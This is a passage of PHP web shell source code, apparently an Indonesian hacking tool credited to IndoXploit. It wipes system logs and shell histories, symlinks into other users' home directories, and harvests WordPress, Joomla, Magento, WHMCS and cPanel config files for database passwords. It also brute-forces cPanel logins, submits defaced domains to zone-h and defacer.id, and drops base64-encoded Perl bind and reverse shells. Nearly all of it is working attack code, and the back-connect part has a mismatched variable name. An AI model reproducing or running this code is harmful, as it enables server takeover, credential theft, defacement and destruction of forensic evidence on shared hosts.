  3126. system("rm -rf /root/.bash_history");
  3127. sleep(2);
  3128. echo'<p>Sudah Terpasang Pengaman .../root/.bash_history </p>';
  3129.  
  3130. system("rm -rf /root/.ksh_history");
  3131. sleep(2);
  3132. echo'<p>Sudah Terpasang Pengaman .../root/.ksh_history </p>';
  3133.  
  3134. system("rm -rf /root/.bash_logout");
  3135. sleep(2);
  3136. echo'<p>Sudah Terpasang Pengaman .../root/.bash_logout </p>';
  3137.  
  3138. system("rm -rf /usr/local/apache/logs");
  3139. sleep(2);
  3140. echo'<p>Sudah Terpasang Pengaman .../usr/local/apache/logs </p>';
  3141.  
  3142. system("rm -rf /usr/local/apache/log");
  3143. sleep(2);
  3144. echo'<p>Sudah Terpasang Pengaman .../usr/local/apache/log </p>';
  3145.  
  3146. system("rm -rf /var/apache/logs");
  3147. sleep(2);
  3148. echo'<p>Sudah Terpasang Pengaman .../var/apache/logs </p>';
  3149.  
  3150. system("rm -rf /var/apache/log");
  3151. sleep(2);
  3152. echo'<p>Sudah Terpasang Pengaman .../var/apache/log </p>';
  3153.  
  3154. system("rm -rf /var/run/utmp");
  3155. sleep(2);
  3156. echo'<p>Sudah Terpasang Pengaman .../var/run/utmp </p>';
  3157.  
  3158. system("rm -rf /var/logs");
  3159. sleep(2);
  3160. echo'<p>Sudah Terpasang Pengaman .../var/logs </p>';
  3161.  
  3162. system("rm -rf /var/log");
  3163. sleep(2);
  3164. echo'<p>Sudah Terpasang Pengaman .../var/log </p>';
  3165.  
  3166. system("rm -rf /var/adm");
  3167. sleep(2);
  3168. echo'<p>Sudah Terpasang Pengaman .../var/adm </p>';
  3169.  
  3170. system("rm -rf /etc/wtmp");
  3171. sleep(2);
  3172. echo'<p>Sudah Terpasang Pengaman .../etc/wtmp </p>';
  3173.  
  3174. system("rm -rf /etc/utmp");
  3175. sleep(2);
  3176. echo'<p>Sudah Terpasang Pengaman .../etc/utmp </p>';
  3177.  
  3178. system("rm -rf $HISTFILE");
  3179. sleep(2);
  3180. echo'<p>Sudah Terpasang Pengaman ...$HISTFILE </p>';
  3181.  
  3182. system("rm -rf /var/log/lastlog");
  3183. sleep(2);
  3184. echo'<p>Sudah Terpasang Pengaman .../var/log/lastlog </p>';
  3185.  
  3186. system("rm -rf /var/log/wtmp");
  3187. sleep(2);
  3188. echo'<p>Sudah Terpasang Pengaman .../var/log/wtmp </p>';
  3189.  
  3190. sleep(4);
  3191.  
  3192. echo '<br><br><p>Sukses Masang Pengamannya ... Bebas Di Server';
  3193. echo"</td></tr></table>";
  3194. }
  3195. elseif($_GET['RaBiitch'] == 'symlink') {
  3196. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $path);
  3197. $d0mains = @file("/etc/named.conf");
  3198. ##httaces
  3199. if($d0mains){
  3200. @mkdir("RaBiitch_sym",0777);
  3201. @chdir("RaBiitch_sym");
  3202. @exe("ln -s / c7e");
  3203. $file3 = 'Options Indexes FollowSymLinks
  3204. DirectoryIndex c7e.htm
  3205. AddType text/plain .php
  3206. AddHandler text/plain .php
  3207. Satisfy Any';
  3208. $fp3 = fopen('.htaccess','w');
  3209. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  3210. echo "
  3211. <table align=center border=1 style='width:60%;border-color:#000000;'>
  3212. <tr>
  3213. <td align=center><font size=2>S. No.</font></td>
  3214. <td align=center><font size=2>Domains</font></td>
  3215. <td align=center><font size=2>Users</font></td>
  3216. <td align=center><font size=2>Symlink</font></td>
  3217. </tr>";
  3218. $dcount = 1;
  3219. foreach($d0mains as $d0main){
  3220. if(eregi("zone",$d0main)){preg_match_all('#zone "(.*)"#', $d0main, $domains);
  3221. flush();
  3222. if(strlen(trim($domains[1][0])) > 2){
  3223. $user = posix_getpwuid(@fileowner("/etc/valiases/".$domains[1][0]));
  3224. echo "<tr align=center><td><font size=2>" . $dcount . "</font></td>
  3225. <td align=left><a href=http://www.".$domains[1][0]."/><font class=txt>".$domains[1][0]."</font></a></td>
  3226. <td>".$user['name']."</td>
  3227. <td><a href='RaBiitch_sym/c7e/home/".$user['name']."/public_html' target='_blank'><font class=txt>Symlink</font></a></td></tr>";
  3228. flush();
  3229. $dcount++;}}}
  3230. echo "</table>";
  3231. }else{
  3232. $TEST=@file('/etc/passwd');
  3233. if ($TEST){
  3234. @mkdir("RaBiitch_sym",0777);
  3235. @chdir("RaBiitch_sym");
  3236. exe("ln -s / c7e");
  3237. $file3 = 'Options Indexes FollowSymLinks
  3238. DirectoryIndex c7e.htm
  3239. AddType text/plain .php
  3240. AddHandler text/plain .php
  3241. Satisfy Any';
  3242. $fp3 = fopen('.htaccess','w');
  3243. $fw3 = fwrite($fp3,$file3);
  3244. @fclose($fp3);
  3245. echo "
  3246. <table align=center border=1><tr>
  3247. <td align=center><font size=3>S. No.</font></td>
  3248. <td align=center><font size=3>Users</font></td>
  3249. <td align=center><font size=3>Symlink</font></td></tr>";
  3250. $dcount = 1;
  3251. $file = fopen("/etc/passwd", "r") or exit("Unable to open file!");
  3252. while(!feof($file)){
  3253. $s = fgets($file);
  3254. $matches = array();
  3255. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);
  3256. $matches = str_replace("home/","",$matches[1]);
  3257. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  3258. continue;
  3259. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  3260. <td align=center><font class=txt>" . $matches . "</td>";
  3261. echo "<td align=center><font class=txt><a href=RaBiitch_sym/c7e/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  3262. $dcount++;}fclose($file);
  3263. echo "</table>";}else{if($os != "Windows"){@mkdir("RaBiitch_sym",0777);@chdir("RaBiitch_sym");@exe("ln -s / c7e");$file3 = '
  3264. Options Indexes FollowSymLinks
  3265. DirectoryIndex c7e.htm
  3266. AddType text/plain .php
  3267. AddHandler text/plain .php
  3268. Satisfy Any
  3269. ';
  3270. $fp3 = fopen('.htaccess','w');
  3271. $fw3 = fwrite($fp3,$file3);@fclose($fp3);
  3272. echo "
  3273. <div class='mybox'><h2 class='k2ll33d2'>server symlinker</h2>
  3274. <table align=center border=1><tr>
  3275. <td align=center><font size=3>ID</font></td>
  3276. <td align=center><font size=3>Users</font></td>
  3277. <td align=center><font size=3>Symlink</font></td></tr>";
  3278. $temp = "";$val1 = 0;$val2 = 1000;
  3279. for(;$val1 <= $val2;$val1++) {$uid = @posix_getpwuid($val1);
  3280. if ($uid)$temp .= join(':',$uid)."\n";}
  3281. echo '<br/>';$temp = trim($temp);$file5 =
  3282. fopen("test.txt","w");
  3283. fputs($file5,$temp);
  3284. fclose($file5);$dcount = 1;$file =
  3285. fopen("test.txt", "r") or exit("Unable to open file!");
  3286. while(!feof($file)){$s = fgets($file);$matches = array();
  3287. $t = preg_match('/\/(.*?)\:\//s', $s, $matches);$matches = str_replace("home/","",$matches[1]);
  3288. if(strlen($matches) > 12 || strlen($matches) == 0 || $matches == "bin" || $matches == "etc/X11/fs" || $matches == "var/lib/nfs" || $matches == "var/arpwatch" || $matches == "var/gopher" || $matches == "sbin" || $matches == "var/adm" || $matches == "usr/games" || $matches == "var/ftp" || $matches == "etc/ntp" || $matches == "var/www" || $matches == "var/named")
  3289. continue;
  3290. echo "<tr><td align=center><font size=2>" . $dcount . "</td>
  3291. <td align=center><font class=txt>" . $matches . "</td>";
  3292. echo "<td align=center><font class=txt><a href=RaBiitch_sym/c7e/home/" . $matches . "/public_html target='_blank'>Symlink</a></td></tr>";
  3293. $dcount++;}
  3294. fclose($file);
  3295. echo "</table></div></center>";unlink("test.txt");
  3296. } else
  3297. echo "<center><font size=3>Cannot create Symlink</font></center>";
  3298. }
  3299. }
  3300. }
  3301. elseif($_GET['RaBiitch'] == 'config') {
  3302. $etc = fopen("/etc/passwd", "r") or die("<pre><font color=red>Can't read /etc/passwd</font></pre>");
  3303. $idx = mkdir("RaBiitch_conf", 0777);
  3304. $isi_htc = "Options all\nRequire None\nSatisfy Any";
  3305. $htc = fopen("RaBiitch_conf/.htaccess","w");
  3306. fwrite($htc, $isi_htc);
  3307. while($passwd = fgets($etc)) {
  3308. if($passwd == "" || !$etc) {
  3309. echo "<font color=red>Can't read /etc/passwd</font>";
  3310. } else {
  3311. preg_match_all('/(.*?):x:/', $passwd, $user_config);
  3312. foreach($user_config[1] as $c7euser) {
  3313. $user_config_dir = "/home/$c7euser/public_html/";
  3314. if(is_readable($user_config_dir)) {
  3315. $grab_config = array(
  3316. "/home/$c7euser/.my.cnf" => "cpanel",
  3317. "/home/$c7euser/.accesshash" => "WHM-accesshash",
  3318. "/home/$c7euser/public_html/po-content/config.php" => "Popoji",
  3319. "/home/$c7euser/public_html/vdo_config.php" => "Voodoo",
  3320. "/home/$c7euser/public_html/bw-configs/config.ini" => "BosWeb",
  3321. "/home/$c7euser/public_html/config/koneksi.php" => "Lokomedia",
  3322. "/home/$c7euser/public_html/lokomedia/config/koneksi.php" => "Lokomedia",
  3323. "/home/$c7euser/public_html/clientarea/configuration.php" => "WHMCS",
  3324. "/home/$c7euser/public_html/whm/configuration.php" => "WHMCS",
  3325. "/home/$c7euser/public_html/whmcs/configuration.php" => "WHMCS",
  3326. "/home/$c7euser/public_html/forum/config.php" => "phpBB",
  3327. "/home/$c7euser/public_html/sites/default/settings.php" => "Drupal",
  3328. "/home/$c7euser/public_html/config/settings.inc.php" => "PrestaShop",
  3329. "/home/$c7euser/public_html/app/etc/local.xml" => "Magento",
  3330. "/home/$c7euser/public_html/joomla/configuration.php" => "Joomla",
  3331. "/home/$c7euser/public_html/configuration.php" => "Joomla",
  3332. "/home/$c7euser/public_html/wp/wp-config.php" => "WordPress",
  3333. "/home/$c7euser/public_html/wordpress/wp-config.php" => "WordPress",
  3334. "/home/$c7euser/public_html/wp-config.php" => "WordPress",
  3335. "/home/$c7euser/public_html/admin/config.php" => "OpenCart",
  3336. "/home/$c7euser/public_html/slconfig.php" => "Sitelok",
  3337. "/home/$c7euser/public_html/application/config/database.php" => "Ellislab");
  3338. foreach($grab_config as $config => $nama_config) {
  3339. $ambil_config = file_get_contents($config);
  3340. if($ambil_config == '') {
  3341. } else {
  3342. $file_config = fopen("RaBiitch_conf/$c7euser-$nama_config.txt","w");
  3343. fputs($file_config,$ambil_config);
  3344. }
  3345. }
  3346. }
  3347. }
  3348. }
  3349. }
  3350. echo "<br><center><a href='?path=$path/RaBiitch_conf'><font>Done</font></a></center>";
  3351. }elseif($_GET['RaBiitch'] == 'adminer') {
  3352. $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $path);
  3353. function adminer($url, $isi) {
  3354. $fp = fopen($isi, "w");
  3355. $ch = curl_init();
  3356. curl_setopt($ch, CURLOPT_URL, $url);
  3357. curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  3358. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  3359. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  3360. curl_setopt($ch, CURLOPT_FILE, $fp);
  3361. return curl_exec($ch);
  3362. curl_close($ch);
  3363. fclose($fp);
  3364. ob_flush();
  3365. flush();
  3366. }
  3367. if(file_exists('adminer.php')) {
  3368. echo "<center><font><a href='$full/adminer.php' target='_blank'>-> Adminer <-</a></font></center>";
  3369. } else {
  3370. if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
  3371. echo "<center><font><a href='$full/adminer.php' target='_blank'>-> Adminer <-</a></font></center>";
  3372. } else {
  3373. echo "<center><font color=red>gagal buat file adminer</font></center>";
  3374. }
  3375. }
  3376. }elseif($_GET['RaBiitch'] == 'crkcp') {
  3377. echo '<center>';
  3378. if($_POST['crack']) {
  3379. $usercp = explode("\r\n", $_POST['user_cp']);
  3380. $passcp = explode("\r\n", $_POST['pass_cp']);
  3381. $i = 0;
  3382. foreach($usercp as $ucp) {
  3383. foreach($passcp as $pcp) {
  3384. if(@mysql_connect('localhost', $ucp, $pcp)) {
  3385. if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  3386. } else {
  3387. $_SESSION[$ucp] = "1";
  3388. $_SESSION[$pcp] = "1";
  3389. if($ucp == '' || $pcp == '') {
  3390.  
  3391. } else {
  3392. $i++;
  3393. if(function_exists('posix_getpwuid')) {
  3394. $domain_cp = file_get_contents("/etc/named.conf");
  3395. if($domain_cp == '') {
  3396. $dom = "<font color=red>gabisa ambil nama domain nya</font>";
  3397. } else {
  3398. preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  3399. foreach($domains_cp[1] as $dj) {
  3400. $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  3401. $user_cp_url = $user_cp_url['name'];
  3402. if($user_cp_url == $ucp) {
  3403. $dom = "<a href='http://$dj/' target='_blank'><font color=green>$dj</font></a>";
  3404. break;
  3405. }
  3406. }
  3407. }
  3408. } else {
  3409. $dom = "<font color=red>function is Disable by system</font>";
  3410. }
  3411. echo "username (<font color=green>$ucp</font>) password (<font color=green>$pcp</font>) domain ($dom)<br>";
  3412. }
  3413. }
  3414. }
  3415. }
  3416. }
  3417. if($i == 0) {
  3418. } else {
  3419. echo "<br>sukses nyolong ".$i." Cpanel by <font color=green>IndoXploit.</font>";
  3420. }
  3421. } else {
  3422. echo "<center>
  3423. <form method='post'>
  3424. USER: <br>
  3425. <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  3426. $_usercp = fopen("/etc/passwd","r");
  3427. while($getu = fgets($_usercp)) {
  3428. if($getu == '' || !$_usercp) {
  3429. echo "<font color=red>Can't read /etc/passwd</font>";
  3430. } else {
  3431. preg_match_all("/(.*?):x:/", $getu, $u);
  3432. foreach($u[1] as $user_cp) {
  3433. if(is_dir("/home/$user_cp/public_html")) {
  3434. echo "$user_cp\n";
  3435. }
  3436. }
  3437. }
  3438. }
  3439. echo "</textarea><br>
  3440. PASS: <br>
  3441. <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  3442. function cp_pass($path) {
  3443. $pass = "";
  3444. $patha = scandir($path);
  3445. foreach($patha as $pathb) {
  3446. if(!is_file("$path/$pathb")) continue;
  3447. $ambil = file_get_contents("$path/$path");
  3448. if(preg_match("/WordPress/", $ambil)) {
  3449. $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  3450. } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  3451. $pass .= ambilkata($ambil,"password = '","'")."\n";
  3452. } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  3453. $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  3454. } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  3455. $pass .= ambilkata($ambil,'password = "','"')."\n";
  3456. } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  3457. $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  3458. } elseif(preg_match("/^[client]$/", $ambil)) {
  3459. preg_match("/password=(.*?)/", $ambil, $pass1);
  3460. if(preg_match('/"/', $pass1[1])) {
  3461. $pass1[1] = str_replace('"', "", $pass1[1]);
  3462. $pass .= $pass1[1]."\n";
  3463. } else {
  3464. $pass .= $pass1[1]."\n";
  3465. }
  3466. } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  3467. $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  3468. }
  3469. }
  3470. echo $pass;
  3471. }
  3472. $cp_pass = cp_pass($path);
  3473. echo $cp_pass;
  3474. echo "</textarea><br>
  3475. <input type='submit' name='crack' style='width: 450px;' value='Crack'>
  3476. </form>
  3477. <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  3478. }
  3479. }
  3480. elseif($_GET['RaBiitch'] == 'zoneh') {
  3481. if($_POST['submit']) {
  3482. echo '<center>';
  3483. $domain = explode("\r\n", $_POST['url']);
  3484. $nick = $_POST['nick'];
  3485. echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
  3486. echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
  3487. function zoneh($url,$nick) {
  3488. $ch = curl_init("http://www.zone-h.com/notify/single");
  3489. curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  3490. curl_setopt($ch, CURLOPT_POST, true);
  3491. curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  3492. return curl_exec($ch);
  3493. curl_close($ch);
  3494. }
  3495. foreach($domain as $url) {
  3496. $zoneh = zoneh($url,$nick);
  3497. if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  3498. echo "$url -> <font>OK</font><br>";
  3499. } else {
  3500. echo "$url -> <font color=red>ERROR</font><br>";
  3501. }
  3502. }
  3503. } else {
  3504. echo "<center><form method='post'>
  3505. <u>Defacer</u>: <br>
  3506. <input type='text' name='nick' size='50' value='4NG3L 0F SH4D0W'><br>
  3507. <u>Domains</u>: <br>
  3508. <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
  3509. <input type='submit' name='submit' value='Submit' style='width: 450px;'>
  3510. </form>";
  3511. }
  3512. echo "</center>";
  3513. }
  3514. elseif($_GET['RaBiitch'] == 'defid') {
  3515. echo "<center><form method='post'>
  3516. <u>Defacer</u>: <br>
  3517. <input type='text' name='hekel' size='50' value='4NG3L 0F SH4D0W'><br>
  3518. <u>Team</u>: <br>
  3519. <input type='text' name='tim' size='50' value='Eldersc0de Family'><br>
  3520. <u>Domains</u>: <br>
  3521. <textarea style='width: 450px; height: 150px;' name='sites'></textarea><br>
  3522. <input type='submit' name='go' value='Submit' style='width: 450px;'>
  3523. </form>";
  3524. $site = explode("\r\n", $_POST['sites']);
  3525. $go = $_POST['go'];
  3526. $hekel = $_POST['hekel'];
  3527. $tim = $_POST['tim'];
  3528. if($go) {
  3529. foreach($site as $sites) {
  3530. $zh = $sites;
  3531. $form_url = "https://www.defacer.id/notify";
  3532. $data_to_post = array();
  3533. $data_to_post['attacker'] = "$hekel";
  3534. $data_to_post['team'] = "$tim";
  3535. $data_to_post['poc'] = 'SQL Injection';
  3536. $data_to_post['url'] = "$zh";
  3537. $curl = curl_init();
  3538. curl_setopt($curl,CURLOPT_URL, $form_url);
  3539. curl_setopt($curl,CURLOPT_POST, sizeof($data_to_post));
  3540. curl_setopt($curl, CURLOPT_USERAGENT, "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322; .NET CLR 2.0.50727)"); //msnbot/1.0 (+http://search.msn.com/msnbot.htm)
  3541. curl_setopt($curl,CURLOPT_POSTFIELDS, $data_to_post);
  3542. curl_setopt($curl, CURLOPT_RETURNTRANSFER, 1);
  3543. curl_setopt($curl, CURLOPT_REFERER, 'https://defacer.id/notify.html');
  3544. $result = curl_exec($curl);
  3545. echo $result;
  3546. curl_close($curl);
  3547. echo "<br>";
  3548. }
  3549. }
  3550. }elseif($_GET['RaBiitch'] == 'jumping') {
  3551. $i = 0;
  3552. echo "<div class='margin: 5px auto;'>";
  3553. if(preg_match("/hsphere/", $dir)) {
  3554. $urls = explode("\r\n", $_POST['url']);
  3555. if(isset($_POST['jump'])) {
  3556. echo "<pre>";
  3557. foreach($urls as $url) {
  3558. $url = str_replace(array("http://","www."), "", strtolower($url));
  3559. $etc = "/etc/passwd";
  3560. $f = fopen($etc,"r");
  3561. while($gets = fgets($f)) {
  3562. $pecah = explode(":", $gets);
  3563. $user = $pecah[0];
  3564. $dir_user = "/hsphere/local/home/$user";
  3565. if(is_dir($dir_user) === true) {
  3566. $url_user = $dir_user."/".$url;
  3567. if(is_readable($url_user)) {
  3568. $i++;
  3569. $jrw = "[<font color=green>R</font>] <a href='?path=$url_user'><font color=gold>$url_user</font></a>";
  3570. if(is_writable($url_user)) {
  3571. $jrw = "[<font color=green>RW</font>] <a href='?path=$url_user'><font color=gold>$url_user</font></a>";
  3572. }
  3573. echo $jrw."<br>";
  3574. }
  3575. }
  3576. }
  3577. }
  3578. if($i == 0) {
  3579. } else {
  3580. echo "<br>Total ada ".$i." Kamar di ".$ip;
  3581. }
  3582. echo "</pre>";
  3583. } else {
  3584. echo '<center>
  3585. <form method="post">
  3586. List Domains: <br>
  3587. <textarea name="url" style="width: 500px; height: 250px;">';
  3588. $fp = fopen("/hsphere/local/config/httpd/sites/sites.txt","r");
  3589. while($getss = fgets($fp)) {
  3590. echo $getss;
  3591. }
  3592. echo '</textarea><br>
  3593. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  3594. </form></center>';
  3595. }
  3596. } elseif(preg_match("/vhosts/", $dir)) {
  3597. $urls = explode("\r\n", $_POST['url']);
  3598. if(isset($_POST['jump'])) {
  3599. echo "<pre>";
  3600. foreach($urls as $url) {
  3601. $web_vh = "/var/www/vhosts/$url/httpdocs";
  3602. if(is_dir($web_vh) === true) {
  3603. if(is_readable($web_vh)) {
  3604. $i++;
  3605. $jrw = "[<font color=green>R</font>] <a href='?path=$web_vh'><font color=gold>$web_vh</font></a>";
  3606. if(is_writable($web_vh)) {
  3607. $jrw = "[<font color=green>RW</font>] <a href='?path=$web_vh'><font color=gold>$web_vh</font></a>";
  3608. }
  3609. echo $jrw."<br>";
  3610. }
  3611. }
  3612. }
  3613. if($i == 0) {
  3614. } else {
  3615. echo "<br>Total ada ".$i." Kamar di ".$ip;
  3616. }
  3617. echo "</pre>";
  3618. } else {
  3619. echo '<center>
  3620. <form method="post">
  3621. List Domains: <br>
  3622. <textarea name="url" style="width: 500px; height: 250px;">';
  3623. bing("ip:$ip");
  3624. echo '</textarea><br>
  3625. <input type="submit" value="Jumping" name="jump" style="width: 500px; height: 25px;">
  3626. </form></center>';
  3627. }
  3628. } else {
  3629. echo "<pre>";
  3630. $etc = fopen("/etc/passwd", "r") or die("<font color=red>Can't read /etc/passwd</font>");
  3631. while($passwd = fgets($etc)) {
  3632. if($passwd == '' || !$etc) {
  3633. echo "<font color=red>Can't read /etc/passwd</font>";
  3634. } else {
  3635. preg_match_all('/(.*?):x:/', $passwd, $user_jumping);
  3636. foreach($user_jumping[1] as $myuser_jump) {
  3637. $user_jumping_dir = "/home/$myuser_jump/public_html";
  3638. if(is_readable($user_jumping_dir)) {
  3639. $i++;
  3640. $jrw = "[<font color=green>R</font>] <a href='?path=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  3641. if(is_writable($user_jumping_dir)) {
  3642. $jrw = "[<font color=green>RW</font>] <a href='?path=$user_jumping_dir'><font color=gold>$user_jumping_dir</font></a>";
  3643. }
  3644. echo $jrw;
  3645. if(function_exists('posix_getpwuid')) {
  3646. $domain_jump = file_get_contents("/etc/named.conf");
  3647. if($domain_jump == '') {
  3648. echo " => ( <font color=red>gabisa ambil nama domain nya</font> )<br>";
  3649. } else {
  3650. preg_match_all("#/var/named/(.*?).db#", $domain_jump, $domains_jump);
  3651. foreach($domains_jump[1] as $dj) {
  3652. $user_jumping_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  3653. $user_jumping_url = $user_jumping_url['name'];
  3654. if($user_jumping_url == $myuser_jump) {
  3655. echo " => ( <u>$dj</u> )<br>";
  3656. break;
  3657. }
  3658. }
  3659. }
  3660. } else {
  3661. echo "<br>";
  3662. }
  3663. }
  3664. }
  3665. }
  3666. }
  3667. if($i == 0) {
  3668. } else {
  3669. echo "<br>Total ada ".$i." Kamar di ".$ip;
  3670. }
  3671. echo "</pre>";
  3672. }
  3673. echo "</div>";
  3674. }elseif($_GET['RaBiitch'] == 'network') {
  3675. echo "<form method='post'>
  3676. <u>Bind Port:</u> <br>
  3677. PORT: <input type='text' placeholder='port' name='port_bind' value='6969'>
  3678. <input type='submit' name='sub_bp' value='>>'>
  3679. </form>
  3680. <form method='post'>
  3681. <u>Back Connect:</u> <br>
  3682. Server: <input type='text' placeholder='ip' name='ip_bc' value='".$_SERVER['REMOTE_ADDR']."'>&nbsp;&nbsp;
  3683. PORT: <input type='text' placeholder='port' name='port_bc' value='6969'>
  3684. <input type='submit' name='sub_bc' value='>>'>
  3685. </form>";
  3686. $bind_port_p="IyEvdXNyL2Jpbi9wZXJsDQokU0hFTEw9Ii9iaW4vc2ggLWkiOw0KaWYgKEBBUkdWIDwgMSkgeyBleGl0KDEpOyB9DQp1c2UgU29ja2V0Ow0Kc29ja2V0KFMsJlBGX0lORVQsJlNPQ0tfU1RSRUFNLGdldHByb3RvYnluYW1lKCd0Y3AnKSkgfHwgZGllICJDYW50IGNyZWF0ZSBzb2NrZXRcbiI7DQpzZXRzb2Nrb3B0KFMsU09MX1NPQ0tFVCxTT19SRVVTRUFERFIsMSk7DQpiaW5kKFMsc29ja2FkZHJfaW4oJEFSR1ZbMF0sSU5BRERSX0FOWSkpIHx8IGRpZSAiQ2FudCBvcGVuIHBvcnRcbiI7DQpsaXN0ZW4oUywzKSB8fCBkaWUgIkNhbnQgbGlzdGVuIHBvcnRcbiI7DQp3aGlsZSgxKSB7DQoJYWNjZXB0KENPTk4sUyk7DQoJaWYoISgkcGlkPWZvcmspKSB7DQoJCWRpZSAiQ2Fubm90IGZvcmsiIGlmICghZGVmaW5lZCAkcGlkKTsNCgkJb3BlbiBTVERJTiwiPCZDT05OIjsNCgkJb3BlbiBTVERPVVQsIj4mQ09OTiI7DQoJCW9wZW4gU1RERVJSLCI+JkNPTk4iOw0KCQlleGVjICRTSEVMTCB8fCBkaWUgcHJpbnQgQ09OTiAiQ2FudCBleGVjdXRlICRTSEVMTFxuIjsNCgkJY2xvc2UgQ09OTjsNCgkJZXhpdCAwOw0KCX0NCn0=";
  3687. if(isset($_POST['sub_bp'])) {
  3688. $f_bp = fopen("/tmp/bp.pl", "w");
  3689. fwrite($f_bp, base64_decode($bind_port_p));
  3690. fclose($f_bp);
  3691.  
  3692. $port = $_POST['port_bind'];
  3693. $out = exe("perl /tmp/bp.pl $port 1>/dev/null 2>&1 &");
  3694. sleep(1);
  3695. echo "<pre>".$out."\n".exe("ps aux | grep bp.pl")."</pre>";
  3696. unlink("/tmp/bp.pl");
  3697. }
  3698. $back_connect_p="IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGlhZGRyPWluZXRfYXRvbigkQVJHVlswXSkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRBUkdWWzFdLCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKTsNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgnL2Jpbi9zaCAtaScpOw0KY2xvc2UoU1RESU4pOw0KY2xvc2UoU1RET1VUKTsNCmNsb3NlKFNUREVSUik7";
  3699. if(isset($_POST['sub_bc'])) {
  3700. $f_bc = fopen("/tmp/bc.pl", "w");
  3701. fwrite($f_bc, base64_decode($bind_connect_p));
  3702. fclose($f_bc);
  3703.  
  3704. $ipbc = $_POST['ip_bc'];
  3705. $port = $_POST['port_bc'];
  3706. $out = exe("perl /tmp/bc.pl $ipbc $port 1>/dev/null 2>&1 &");
  3707. sleep(1);
  3708. echo "<pre>".$out."\n".exe("ps aux | grep bc.pl")."</pre>";
  3709. unlink("/tmp/bc.pl");
  3710. }
  3711. }elseif($_GET['RaBiitch'] == 'jumping') {
  3712. $i = 0;
  3713. echo "<div class='margin: 5px auto;'>";
  3714. if(preg_match("/hsphere/", $dir)) {
  3715. $urls = explode("\r\n", $_POST['url']);
  3716. if(isset($_POST['jump'])) {
  3717. echo "<pre>";
  3718. foreach($urls as $url) {
  3719. $url = str_replace(array("http://","www."), "", strtolower($url));
  3720. $etc = "/etc/passwd";
  3721. $f = fopen($etc,"r");
  3722. while($gets = fgets($f)) {
  3723. $pecah = explode(":", $gets);
  3724. $user = $pecah[0];
  3725. $dir_user = "/hsphere/local/home/$user";
  3726. if(is_dir($dir_user) === true) {
  3727. $url_user = $dir_user."/".$url;
  3728. if(is_readable($url_user)) {
  3729. $i++;
  3730. $jrw = "[<font color=green>R</font>] <a href='?path=$url_user'><font color=gold>$url_user</font></a>";
  3731. if(is_writable($url_user)) {
  3732. $jrw = "[<font color=green>RW</font>] <a href='?path=$url_user'><font color=gold>$url_user</font></a>";
  3733. }
  3734. echo $jrw."<br>";
  3735. }
  3736. }
  3737. }
  3738. }
  3739. if($i == 0) {
  3740. } else {
  3741. echo "<br>Total ada ".$i." Kamar di ".$ip;
  3742. }
  3743. echo "</pre>";
  3744. } else {
  3745. echo '<center>
  3746. <form method="post">
  3747. List Domains: <br>
  3748. <textarea name="url" style="width: 500px; height: 250px;">';
